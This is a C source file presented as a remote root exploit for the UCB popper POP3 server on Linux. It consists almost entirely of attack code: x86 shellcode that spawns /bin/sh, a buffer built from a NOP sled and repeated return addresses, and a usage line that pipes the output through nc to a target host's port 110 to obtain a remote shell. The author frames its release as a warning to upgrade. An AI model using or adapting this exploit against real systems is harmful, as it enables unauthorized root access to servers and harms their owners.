/* 
 * Remote root exploit for UCB popper on Linux 
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 * 
 * Usage: ( ./linux-ucb 0 ; cat ) | nc your.host.com 110
 * Try adjusting offsets by 100.
 *
 * Tested on UCB Pop server (version 1.831beta) 
 * 
 * I figure it's safe to release this since UCB is not that 
 * common anymore.  But if you are still running it on your 
 * system(s), you had better upgrade.  This program shows you 
 * why.
 * 
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <unistd.h>
#include        <sys/errno.h>

/* Linux x86 shellcode */
char *shell=
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh";


#define ADDR 0xbffff1d8 
#define OFFSET 0
#define BUFLEN 1100

char    buffer[BUFLEN];
int     offset=OFFSET;


int main (int argc, char *argv[]) {
        int i;

        if(argc > 2) {
                printf("Usage: %s [offset]\n",argv[0]);
                exit(0);
        }
        if(argc==2)
                offset=atoi(argv[1]);

        /* Set up the buffer */
        memset(buffer,0x90,BUFLEN);
        memcpy(buffer+BUFLEN-200-strlen(shell),shell,strlen(shell));
        for(i=BUFLEN-200+1;i<BUFLEN-4;i+=4) 
                *(int *)&buffer[i]=ADDR-BUFLEN+100+offset; 
        buffer[BUFLEN-1]='\n';

	printf("%s\n", buffer); 
}